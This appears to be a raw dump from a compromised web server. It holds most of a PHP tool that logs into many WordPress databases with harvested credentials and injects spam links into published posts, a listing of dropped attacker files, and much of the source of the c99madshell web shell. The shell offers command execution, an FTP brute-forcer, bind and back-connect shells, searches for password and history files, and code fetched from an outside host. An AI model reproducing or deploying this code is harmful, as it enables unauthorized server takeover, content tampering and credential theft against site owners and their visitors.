$num_of_links = COUNT($links); dbg_prn('COUNT OF DATABASES pass.txt - '.$num_of_bd .'FILE - <strong>'.$flink.'</strong>; COUNT OF LINKS - ' .$num_of_links); } else { fwrite($lch, "!ERR: pswd OR ".$flink."file not exist\n"); return FALSE; } $total_updates = $n_bases = $i_url = 0; foreach ($pswds as $a_line) { $atr = get_db_atr($a_line); $db = new db($atr['host'], $atr['user'], $atr['pass'], $atr['db']); if ($db->status != "connected") { fwrite($lch, "<span style='color:#fb0000;'>".$db->status ."</span>\n<br>"); } $get_url = $db->fetch_assoc("SELECT `option_value` FROM `wp_options` WHERE `option_name` = 'siteurl' OR `option_name` = 'home'"); if (isset($get_url[0]['option_value'])) { $tmp_url = $get_url[0]['option_value']; } else if (isset($get_url[1]['option_value'])) { $tmp_url = $get_url[1]['option_value']; } else { $tmp_url = "http://"; } if ($tmp_url != "http://") { $find_s_pattern = "/http\:\/\/.+\.[a-zA-Z0-9]{0,5}[\.a-zA-Z0-9]{0,5}?/i"; if (preg_match($find_s_pattern, $tmp_url, $matches)) { $tmp_url = $matches[0]."."; } else { $tmp_url = $tmp_url."."; } } $res = $db->fetch_assoc("SELECT `ID`, `guid`, `post_content` FROM `".$atr['pref']."posts` WHERE `post_status` = 'publish' AND post_type='post'"); $count_posts = count($res); $str_scr = 'TOTAL COUNT OF POST IN '.trim($a_line).' - '.$count_posts; $pattern = "~.*?[.?!](?:\s|$)~s"; $ret_arr = array(); $r_idx = NULL; $saved_links = $empty_links = $count_post_ready_to_injekt = $count_good_post = 0; if(isset($res)){ foreach($res as $key => $val){ $prop = $val['post_content']; if(preg_match_all($pattern, $prop, $proposals)) { $r_idx = array_rand($proposals[0]); $fl_p_ok = FALSE; $k = 0; $ar_kase = Array(); while(!$fl_p_ok AND count($ar_kase) < count($proposals[0])){ $k++; $r_idx = array_rand($proposals[0]); $ar_kase[] = $r_idx; $ar_kase = array_values(array_unique($ar_kase)); $prop = $proposals[0][$r_idx]; if(strlen(strip_tags($prop)) <> strlen($prop)) { $fl_p_ok = FALSE; } else { $fl_p_ok = TRUE; } } unset($ar_kase); if (!$fl_p_ok){ $empty_links++; dbg_prn('EMPTY POST'); dbg_prn($val); } else { $fl = FALSE; foreach ($links as $content) { $link_in_post = FALSE; $poisk = trim($content); $link_in_post = strpos($val['post_content'], $poisk); if($link_in_post){ $have_id = $val['ID']; $saved_links++; dbg_prn($have_id.' already have an injected url. ' .$poisk); $fl = TRUE; } } } if (($fl_p_ok) AND (!$fl)) { $ret_arr[] = $val; } } else { $empty_links++; } } $res = $ret_arr; unset($ret_arr); $count_good_post = count($res); $str_scr .= ' COUNT OF INJECTED POST - '.$saved_links .' COUNT OF EMPTY POST - '.$empty_links .' COUNT OF GOOD POST - '.$count_good_post; dbg_prn($str_scr); dbg_prn($res); $count_post_ready_to_injekt = $count_posts - $saved_links - $empty_links; if ($count_good_post >= NPOST) { $num_upd_post = NPOST; }else{ $num_upd_post = $count_good_post; } } else { dbg_prn('EMPTY RESULT (NO POST IN BATABASE)'); } if(isset($res) AND ($num_upd_post > 0) ){ dbg_prn($res); dbg_prn($num_upd_post); $random_keys = array_rand($res, $num_upd_post); if(isset($random_keys)){ if($random_keys == 0){ $tmp_ar = Array(); $tmp_ar[] = 0; $random_keys = $tmp_ar; } foreach ($random_keys as $post) { $url_unit = $links[$i_url]; $prop = $res[$post]['post_content']; preg_match_all($pattern, $prop, $proposals); $fl_p_ok = FALSE; $k = 0; $ar_kase = Array(); while(!$fl_p_ok AND count($ar_kase) < count($proposals[0])){ $k++; $r_idx = array_rand($proposals[0]); $ar_kase[] = $r_idx; $ar_kase = array_values(array_unique($ar_kase)); $prop = $proposals[0][$r_idx]; if(strlen(strip_tags($prop)) <> strlen($prop)) { $fl_p_ok = FALSE; } else { $fl_p_ok = TRUE; } } unset($ar_kase); $prop_ar = explode(" ", $prop); $unic = array_unique($prop_ar); $diff = array_diff_assoc($prop_ar, $unic); $out = array_diff($prop_ar, $diff); $word_rkey = array_rand($out); $word = $prop_ar[$word_rkey]; $cnt_word = $replace_unit = NULL; dbg_prn($prop); $zam = " ".$url_unit." ".$word." "; $replace_unit = str_replace($word, $zam, $prop, $cnt_word); dbg_prn($cnt_word); dbg_prn($replace_unit); $cnt_prop = $posting_string = NULL; $posting_string = str_replace($prop, $replace_unit, $res[$post]['post_content'], $cnt_prop); dbg_prn($posting_string); dbg_prn($cnt_prop); $count = 1; if(isset($posting_string) AND $cnt_prop == 1 AND $fl_p_ok){ $upd = "UPDATE `".$atr['pref']."posts` SET `post_content`='" .addslashes($posting_string) ."' WHERE `ID` = ".$res[$post]['ID'].""; $db->query($upd); $total_updates++; $log['dt'] = date("Y-m-d H:i"); $log['id'] = (int)$res[$post]['ID']; $log['guid'] = trim($res[$post]['guid']); $log['bd'] = trim($a_line); $log['link'] = (int)($i_url+1); $log['url'] = trim($url_unit); $log_str = implode(SEP, $log); dbg_prn($log_str, TRUE); Log::write($log_str, PROC_LOG); $i_url++; if($i_url >= $num_of_links){ $i_url = 0;} } else { $log_str = date("Y-m-d H:i").SEP.(int)$res[$post]['ID']. SEP.trim($res[$post]['guid']).' ERRORS, ODNAKO...'; dbg_prn($log_str, TRUE); } } } else { $log_str = date("Y-m-d H:i").SEP.$random_keys .' ERRORS, ODNAKO...'; dbg_prn($log_str, TRUE); } } $n_bases++; fwrite($lch, date("Y-m-d H:i").": ".$atr['host']." Walthru OK no errors<br>\n"); unset($db); unset($res); } fclose($lch); echo "<div style='padding: 5px; background: #ccc'>Post injected: ".$total_updates."</div>"; echo "<div style='padding: 5px; background: #ccc'>Bases walked: ".$n_bases."</div>"; } function reverse_posting() { $reverses = get_ar_file( PROC_LOG.LOG_EXT ); if(isset($reverses)){ foreach ($reverses as $reverse) { if(strlen($reverse) > 20){ LIST($log['dt'], $log['id'], $log['guid'], $log['bd'], $log['link'], $log['url']) = explode(SEP, $reverse); $atr = get_db_atr($log['bd']); $db = new db($atr['host'], $atr['user'], $atr['pass'], $atr['db']); if ($res = $db->fetch_row("SELECT `post_content` FROM `".$atr['pref']."posts` WHERE `ID` = '".$log['id']."'")) { $replace_unit = str_replace(trim($log['url']), '', $res[0][0], $count); if($count > 0){ $db->query("UPDATE `".$atr['pref']."posts` SET `post_content`='".$replace_unit."' WHERE `ID` = '".$log['id']."'"); $stat = ' successfully  restored'; }else{$stat = ' not contain url';} $log_str = date("Y-m-d H:i").' POST - '.$log['guid'].$stat; dbg_prn($log_str, TRUE); Log::write($log_str, 'reverse'); } else {echo "Somthing wrong: ".$db->errors;} unset($res); unset($db); } } } unset($reverses); } function get_db_atr($str) { LIST($atr['host'], $atr['user'], $atr['pass'], $atr['db'], $atr['pref']) = explode(':', trim($str)); return $atr; } function checkInstall ($params, $type) { foreach ($params as $key=>$value) { $filename = $value.".".$type; if (!file_exists($filename)) { $fh = fopen($filename, "w"); fclose($fh); echo "Conf file <b>".$filename."</b> created<br />\n"; } } } class db { protected $link; private $server, $username, $password, $db; public $status; public $errors=""; public function __construct($server, $username, $password, $db) { $this->server = $server; $this->username = $username; $this->password = $password; $this->db = $db; return $this->connect(); } private function connect() { if ($this->link = mysql_connect($this->server, $this->username, $this->password)) { mysql_select_db($this->db); mysql_query("SET NAMES UTF8"); $this->status = "connected"; } else { $this->status = "Could not connect to ".$this->username."@".$this->server; } } public function fetch_assoc($query) { $result = mysql_query($query); $i = 0; $this->errors = mysql_error()."\n"; while($r = mysql_fetch_assoc($result)){ foreach ($r as $key=>$value){ $response[$i][$key] = $value; } $i++; } return $response; mysql_free_result($result); } public function fetch_row($query) { $result = mysql_query($query); $this->errors = mysql_error()."\n"; $i = 0; while($r = mysql_fetch_row($result)){ foreach ($r as $key=>$value){ $response[$i][$key] = $value; } $i++; } return $response; mysql_free_result($result); } public function query($q) { mysql_query($q); } public function __destruct() { @mysql_close($this->link); } } function showLog($log_type = PROC_LOG) { $file = get_ar_file($log_type.LOG_EXT); if($file){ foreach($file as $log){ echo htmlspecialchars($log).BR; } } } function preDownloadLogs() { if (file_exists(ARCH)){ unlink(ARCH); } $output = exec( 'tar -czvf '.ARCH.' process.log connect.log' ); if (is_null ( $output )) { echo "error gzip"; } else { echo "<pre>log package <b>".ARCH."</b> created</pre>"; echo "<a href='".ARCH."'>download logs</a>"; } } function dbg_prn($s, $fl= DBG) { if($fl) { $pre = $post = NULL; $pre = '<PRE>'; $post ='</PRE>'; echo $pre; print_r($s); echo $post.PHP_EOL; }} class Log{ static function write($mess="", $name="info_error"){ if(strlen(trim($mess)) < 2){ return FALSE; } if(preg_match("/^([_a-z0-9A-Z]+)$/i", $name, $matches)){ $text = $mess.PHP_EOL; $filename = $name.LOG_EXT; if(!is_writable($filename)) { dbg_prn('Is NOT writable file '.$filename);return FALSE; } if (!$handle = fopen($filename, "a+")) {dbg_prn('Cannot open file '.$filename);return FALSE;} @flock ($handle, LOCK_EX); if(fwrite ($handle, $text)=== FALSE ) {dbg_prn('Cannot write to file '.$filename);return FALSE;} @flock ($handle, LOCK_UN); if (!fclose($handle)) {dbg_prn('Cannot close file '.$filename); return FALSE;} return TRUE; }else{return FALSE;} } } function get_ar_file($name) { $mas = Array(); if(is_readable($name)) { $handle = fopen($name, 'r'); if($handle){ while (!feof($handle)) { $mas[]= trim(fgets($handle)); } fclose($handle); }else{ dbg_prn("BAD FILE :".$name); return NULL; } $handle = NULL; return $mas; }else{ dbg_prn('FILE :'.$name.' is not a readable'); return NULL; } } function make_seed() { list($usec, $sec) = explode(' ', microtime()); return (float) $sec + ((float) $usec * 100000); } ?>
</div>
</body>
</html>

other files:

-rw-r--r-- 1 wwwrun www   2922 Apr  2  2013 connect.log
-rwxrwxrwx 1   1000 1000 39481 Mar 28  2013 links.txt
-rwxrwxrwx 1   1000 1000 23690 Mar 29  2013 links1.txt
-rwxrwxrwx 1   1000 1000  1834 Apr  1  2013 pass.txt
-rw-r--r-- 1 wwwrun www  21741 Apr  2  2013 process.log
-rw-r--r-- 1 wwwrun www      0 Apr  2  2013 reverse.log

/home/www/confixx/html/include/template/templates_c

-rw-r--r-- 1 wwwrun www      8650 May 21  2014 0x1.jpg
-rw-r--r-- 1 wwwrun www     45101 May 21  2014 2014.zip
-rwxr-xr-x 1 wwwrun www        45 May  8  2014 a.sh
-rw-r--r-- 1 wwwrun www     12084 May  7  2014 caps.php
-rw-r--r-- 1 web335 web335  44285 May  7  2014 maz.php
-rw-r--r-- 1 wwwrun www    144201 May  8  2014 nomad4.php
-rw-r--r-- 1 wwwrun www     64512 May 21  2014 rcon.exe

nomad4.php

<?php
if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
error_reporting(5);
@ignore_user_abort(TRUE);
@set_magic_quotes_runtime(0);
$win = strtolower(substr(PHP_OS,0,3)) == "win";
define("starttime",getmicrotime());
if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
$_REQUEST = array_merge($_COOKIE,$_POST);
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
$shver = "2.0 madnet edition";
if (empty($surl))
{
 $surl = $_SERVER['PHP_SELF'];
}
$surl = htmlspecialchars($surl);
 
$timelimit = 0;
$host_allow = array("*");
$login_txt = "Admin area";
$accessdeniedmess = "<a href=\"http://securityprobe.net\">c99madshell v.".$shver."</a>: access denied";
$gzipencode = TRUE;
$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server
$filestealth = TRUE;
$donated_html = "<center><b>Owned by root</b></center>";
$donated_act = array("");
$curdir = "./";
$tmpdir = "";
$tmpdir_log = "./";
 
$log_email = "user@host.gov";
$sort_default = "0a";
$sort_save = TRUE;
 
$ftypes  = array(
 "html"=>array("html","htm","shtml"),
 "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
 "exe"=>array("sh","install","bat","cmd"),
 "ini"=>array("ini","inf"),
 "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
 "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
 "sdb"=>array("sdb"),
 "phpsess"=>array("sess"),
 "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
);
 
 
$exeftypes  = array(
 getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
 "perl %f%" => array("pl","cgi")
);
 
$regxp_highlight  = array(
  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"),
  array("config.php",1) // example
);
 
$safemode_diskettes = array("a");
$hexdump_lines = 8;
$hexdump_rows = 24;
$nixpwdperpage = 100;
$bindport_pass = "c99mad";
$bindport_port = "31373";
$bc_port = "31373";
$datapipe_localport = "8081";
if (!$win)
{
 $cmdaliases = array(
  array("-----------------------------------------------------------", "ls -la"),
  array("find all suid files", "find / -type f -perm -04000 -ls"),
  array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
  array("find all sgid files", "find / -type f -perm -02000 -ls"),
  array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
  array("find config.inc.php files", "find / -type f -name config.inc.php"),
  array("find config* files", "find / -type f -name \"config*\""),
  array("find config* files in current dir", "find . -type f -name \"config*\""),
  array("find all writable folders and files", "find / -perm -2 -ls"),
  array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
  array("find all service.pwd files", "find / -type f -name service.pwd"),
  array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
  array("find all .htpasswd files", "find / -type f -name .htpasswd"),
  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
  array("find all .bash_history files", "find / -type f -name .bash_history"),
  array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
  array("list file attributes on a Linux second extended file system", "lsattr -va"),
  array("show opened ports", "netstat -an | grep -i listen")
 );
}
else
{
 $cmdaliases = array(
  array("-----------------------------------------------------------", "dir"),
  array("show opened ports", "netstat -an")
 );
}
 
$sess_cookie = "c99shvars";
 
$usefsbuff = TRUE;
$copy_unset = FALSE;
 
$quicklaunch = array(
 array("<b><hr>HOME</b>",$surl),
 array("<b><=</b>","#\" onclick=\"history.back(1)"),
 array("<b>=></b>","#\" onclick=\"history.go(1)"),
 array("<b>UPDIR</b>","#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='%upd';document.todo.sort.value='%sort';document.todo.submit();"),
 array("<b>Search</b>","#\" onclick=\"document.todo.act.value='search';document.todo.d.value='%d';document.todo.submit();"),
 array("<b>Buffer</b>","#\" onclick=\"document.todo.act.value='fsbuff';document.todo.d.value='%d';document.todo.submit();"),
 array("<b>Tools</b>","#\" onclick=\"document.todo.act.value='tools';document.todo.d.value='%d';document.todo.submit();"),
 array("<b>Proc.</b>","#\" onclick=\"document.todo.act.value='processes';document.todo.d.value='%d';document.todo.submit();"),
 array("<b>FTP brute</b>","#\" onclick=\"document.todo.act.value='ftpquickbrute';document.todo.d.value='%d';document.todo.submit();"),
 array("<b>Sec.</b>","#\" onclick=\"document.todo.act.value='security';document.todo.d.value='%d';document.todo.submit();"),
 array("<b>SQL</b>","#\" onclick=\"document.todo.act.value='sql';document.todo.d.value='%d';document.todo.submit();"),
 array("<b>PHP-code</b>","#\" onclick=\"document.todo.act.value='eval';document.todo.d.value='%d';document.todo.submit();"),
 array("<b>Self remove</b>","#\" onclick=\"document.todo.act.value='selfremove';document.todo.submit();"),
 array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
);
 
$highlight_background = "#c0c0c0";
$highlight_bg = "#FFFFFF";
$highlight_comment = "#6A6A6A";
$highlight_default = "#0000BB";
$highlight_html = "#1300FF";
$highlight_keyword = "#007700";
$highlight_string = "#000000";
 
@$f = $_REQUEST["f"];
@extract($_REQUEST["c99shcook"]);
/////////////////////////////////////
@set_time_limit(0);
$tmp = array();
foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
$s = "!^(".implode("|",$tmp).")$!i";
if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://securityprobe.net\">c99madshell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
if (!empty($login))
{
 if (empty($md5_pass)) {$md5_pass = md5($pass);}
 if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
 {
  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
  header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\"");
  header("HTTP/1.0 401 Unauthorized");
  exit($accessdeniedmess);
 }
}
 
if (isset($_POST['act'])) $act  = $_POST['act'];
if (isset($_POST['d'])) $d    = urldecode($_POST['d']);
if (isset($_POST['sort'])) $sort = $_POST['sort'];
if (isset($_POST['f'])) $f    = $_POST['f'];
if (isset($_POST['ft'])) $ft   = $_POST['ft'];
if (isset($_POST['grep'])) $grep = $_POST['grep'];
if (isset($_POST['processes_sort'])) $processes_sort = $_POST['processes_sort'];
if (isset($_POST['pid'])) $pid  = $_POST['pid'];
if (isset($_POST['sig'])) $sig  = $_POST['sig'];
if (isset($_POST['base64'])) $base64  = $_POST['base64'];
if (isset($_POST['fullhexdump'])) $fullhexdump  = $_POST['fullhexdump'];
if (isset($_POST['c'])) $c  = $_POST['c'];
if (isset($_POST['white'])) $white  = $_POST['white'];
if (isset($_POST['nixpasswd'])) $nixpasswd  = $_POST['nixpasswd'];
 
$lastdir = realpath(".");
chdir($curdir);
$sess_data = unserialize($_COOKIE["$sess_cookie"]);
if (!is_array($sess_data)) {$sess_data = array();}
if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
 
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
{
 $disablefunc = str_replace(" ","",$disablefunc);
 $disablefunc = explode(",",$disablefunc);
}
 
if (!function_exists("c99_buff_prepare"))
{
function c99_buff_prepare()
{
 global $sess_data;
 global $act;
 foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
 foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
 $sess_data["copy"] = array_unique($sess_data["copy"]);
 $sess_data["cut"] = array_unique($sess_data["cut"]);
 sort($sess_data["copy"]);
 sort($sess_data["cut"]);
 if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
 else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
}
}
c99_buff_prepare();
if (!function_exists("c99_sess_put"))
{
function c99_sess_put($data)
{
 global $sess_cookie;
 global $sess_data;
 c99_buff_prepare();
 $sess_data = $data;
 $data = serialize($data);
 setcookie($sess_cookie,$data);
}
}
foreach (array("sort","sql_sort") as $v)
{
 if (!empty($_POST[$v])) {$$v = $_POST[$v];}
}
if ($sort_save)
{
 if (!empty($sort)) {setcookie("sort",$sort);}
 if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
}
if (!function_exists("str2mini"))
{
function str2mini($content,$len)
{
 if (strlen($content) > $len)
 {
  $len = ceil($len/2) - 2;
  return substr($content, 0,$len)."...".substr($content,-$len);
 }
 else {return $content;}
}
}
if (!function_exists("view_size"))
{
function view_size($size)
{
 if (!is_numeric($size)) {return FALSE;}
 else
 {
  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
  else {$size = $size . " B";}
  return $size;
 }
}
}
if (!function_exists("fs_copy_dir"))
{
function fs_copy_dir($d,$t)
{
 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
 $h = opendir($d);
 while (($o = readdir($h)) !== FALSE)
 {
  if (($o != ".") and ($o != ".."))
  {
   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
   if (!$ret) {return $ret;}
  }
 }
 closedir($h);
 return TRUE;
}
}
if (!function_exists("fs_copy_obj"))
{
function fs_copy_obj($d,$t)
{
 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
 if (!is_dir(dirname($t))) {mkdir(dirname($t));}
 if (is_dir($d))
 {
  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  return fs_copy_dir($d,$t);
 }
 elseif (is_file($d)) {return copy($d,$t);}
 else {return FALSE;}
}
}
if (!function_exists("fs_move_dir"))
{
function fs_move_dir($d,$t)
{
 $h = opendir($d);
 if (!is_dir($t)) {mkdir($t);}
 while (($o = readdir($h)) !== FALSE)
 {
  if (($o != ".") and ($o != ".."))
  {
   $ret = TRUE;
   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
   if (!$ret) {return $ret;}
  }
 }
 closedir($h);
 return TRUE;
}
}
if (!function_exists("fs_move_obj"))
{
function fs_move_obj($d,$t)
{
 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
 if (is_dir($d))
 {
  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  return fs_move_dir($d,$t);
 }
 elseif (is_file($d))
 {
  if(copy($d,$t)) {return unlink($d);}
  else {unlink($t); return FALSE;}
 }
 else {return FALSE;}
}
}
if (!function_exists("fs_rmdir"))
{
function fs_rmdir($d)
{
 $h = opendir($d);
 while (($o = readdir($h)) !== FALSE)
 {
  if (($o != ".") and ($o != ".."))
  {
   if (!is_dir($d.$o)) {unlink($d.$o);}
   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
  }
 }
 closedir($h);
 rmdir($d);
 return !is_dir($d);
}
}
if (!function_exists("fs_rmobj"))
{
function fs_rmobj($o)
{
 $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
 if (is_dir($o))
 {
  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
  return fs_rmdir($o);
 }
 elseif (is_file($o)) {return unlink($o);}
 else {return FALSE;}
}
}
if (!function_exists("myshellexec"))
{
function myshellexec($cmd)
{
 global $disablefunc;
 $result = "";
 if (!empty($cmd))
 {
  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  elseif (($result = `$cmd`) !== FALSE) {}
  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_resource($fp = popen($cmd,"r")))
  {
   $result = "";
   while(!feof($fp)) {$result .= fread($fp,1024);}
   pclose($fp);
  }
 }
 return $result;
}
}
if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
if (!function_exists("view_perms"))
{
function view_perms($mode)
{
 if (($mode & 0xC000) === 0xC000) {$type = "s";}
 elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
 elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
 elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
 elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
 elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
 elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
 else {$type = "?";}
 
 $owner["read"] = ($mode & 00400)?"r":"-";
 $owner["write"] = ($mode & 00200)?"w":"-";
 $owner["execute"] = ($mode & 00100)?"x":"-";
 $group["read"] = ($mode & 00040)?"r":"-";
 $group["write"] = ($mode & 00020)?"w":"-";
 $group["execute"] = ($mode & 00010)?"x":"-";
 $world["read"] = ($mode & 00004)?"r":"-";
 $world["write"] = ($mode & 00002)? "w":"-";
 $world["execute"] = ($mode & 00001)?"x":"-";
 
 if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
 if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
 if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
 
 return $type.join("",$owner).join("",$group).join("",$world);
}
}
if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
if (!function_exists("parse_perms"))
{
function parse_perms($mode)
{
 if (($mode & 0xC000) === 0xC000) {$t = "s";}
 elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
 elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
 elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
 elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
 elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
 elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
 else {$t = "?";}
 $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
 $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
 $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
 return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
}
}
if (!function_exists("parsesort"))
{
function parsesort($sort)
{
 $one = intval($sort);
 $second = substr($sort,-1);
 if ($second != "d") {$second = "a";}
 return array($one,$second);
}
}
if (!function_exists("view_perms_color"))
{
function view_perms_color($o)
{
 if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
 elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
 else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
}
}
if (!function_exists("c99getsource"))
{
function c99getsource($fn)
{
 global $c99sh_sourcesurl;
 $array = array(
  "c99sh_bindport.pl" => "c99sh_bindport_pl.txt",
  "c99sh_bindport.c" => "c99sh_bindport_c.txt",
  "c99sh_backconn.pl" => "c99sh_backconn_pl.txt",
  "c99sh_backconn.c" => "c99sh_backconn_c.txt",
  "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt",
  "c99sh_datapipe.c" => "c99sh_datapipe_c.txt",
 );
 $name = $array[$fn];
 if ($name) {return file_get_contents($c99sh_sourcesurl.$name);}
 else {return FALSE;}
}
}
if (!function_exists("mysql_dump"))
{
function mysql_dump($set)
{
 global $shver;
 $sock = $set["sock"];
 $db = $set["db"];
 $print = $set["print"];
 $nl2br = $set["nl2br"];
 $file = $set["file"];
 $add_drop = $set["add_drop"];
 $tabs = $set["tabs"];
 $onlytabs = $set["onlytabs"];
 $ret = array();
 $ret["err"] = array();
 if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
 if (empty($db)) {$db = "db";}
 if (empty($print)) {$print = 0;}
 if (empty($nl2br)) {$nl2br = 0;}
 if (empty($add_drop)) {$add_drop = TRUE;}
 if (empty($file))
 {
  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
 }
 if (!is_array($tabs)) {$tabs = array();}
 if (empty($add_drop)) {$add_drop = TRUE;}
 if (sizeof($tabs) == 0)
 {
  // retrive tables-list
  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
 }
 $out = "# Dumped by C99madShell.SQL v. ".$shver."
# Home page: http://securityprobe.net
#
# Host settings:
# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
# Date: ".date("d.m.Y H:i:s")."
# DB: \"".$db."\"
#---------------------------------------------------------
";
